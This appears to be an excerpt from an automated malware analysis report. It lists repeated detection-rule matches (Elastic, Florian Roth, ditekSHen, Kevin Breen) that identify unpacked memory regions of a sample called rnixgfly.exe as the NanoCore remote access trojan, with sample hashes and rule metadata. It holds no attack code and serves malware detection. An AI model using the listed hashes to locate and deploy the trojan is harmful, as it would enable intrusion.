    Source: 2.2.rnixgfly.exe.5810000.21.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 2.2.rnixgfly.exe.25e0e74.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.25e0e74.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.25e0e74.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 2.2.rnixgfly.exe.25e0e74.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 2.2.rnixgfly.exe.359abf4.17.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.359abf4.17.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.359abf4.17.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 2.2.rnixgfly.exe.359abf4.17.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 1.2.rnixgfly.exe.2223658.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 1.2.rnixgfly.exe.2223658.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 1.2.rnixgfly.exe.2223658.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 1.2.rnixgfly.exe.2223658.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 1.2.rnixgfly.exe.2223658.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 2.2.rnixgfly.exe.25935b0.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.25935b0.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.25935b0.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 2.2.rnixgfly.exe.25935b0.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 2.2.rnixgfly.exe.372095a.12.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 2.2.rnixgfly.exe.372095a.12.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 2.2.rnixgfly.exe.372095a.12.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 1.2.rnixgfly.exe.2210000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 1.2.rnixgfly.exe.2210000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 1.2.rnixgfly.exe.2210000.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 1.2.rnixgfly.exe.2210000.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 1.2.rnixgfly.exe.2210000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 2.2.rnixgfly.exe.370c32d.13.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.370c32d.13.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.370c32d.13.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 2.2.rnixgfly.exe.370c32d.13.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 2.2.rnixgfly.exe.6830000.32.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.6830000.32.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.6830000.32.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 2.2.rnixgfly.exe.6830000.32.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 2.2.rnixgfly.exe.35efa21.15.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.35efa21.15.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.35efa21.15.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 2.2.rnixgfly.exe.35efa21.15.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 2.2.rnixgfly.exe.358c350.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.358c350.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.358c350.11.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 2.2.rnixgfly.exe.358c350.11.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 2.2.rnixgfly.exe.35eb3f8.18.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.35eb3f8.18.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.35eb3f8.18.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 2.2.rnixgfly.exe.35eb3f8.18.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 2.2.rnixgfly.exe.38b64be.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.38b64be.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.38b64be.10.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 2.2.rnixgfly.exe.38b64be.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 2.2.rnixgfly.exe.3590fef.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.3590fef.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.3590fef.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 2.2.rnixgfly.exe.3590fef.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 2.2.rnixgfly.exe.67c0000.27.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.67c0000.27.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.67c0000.27.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 2.2.rnixgfly.exe.67c0000.27.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 2.2.rnixgfly.exe.370c32d.13.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 2.2.rnixgfly.exe.370c32d.13.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 2.2.rnixgfly.exe.67f0000.28.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.67f0000.28.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.67f0000.28.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 2.2.rnixgfly.exe.67f0000.28.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 2.2.rnixgfly.exe.370c32d.13.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 2.2.rnixgfly.exe.2583a9c.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.2583a9c.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.2583a9c.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 2.2.rnixgfly.exe.2583a9c.8.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 2.2.rnixgfly.exe.2583a9c.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 2.2.rnixgfly.exe.25faee8.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.25faee8.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.25faee8.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 2.2.rnixgfly.exe.25faee8.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 2.2.rnixgfly.exe.5d60000.25.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.5d60000.25.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.5d60000.25.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 2.2.rnixgfly.exe.5d60000.25.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
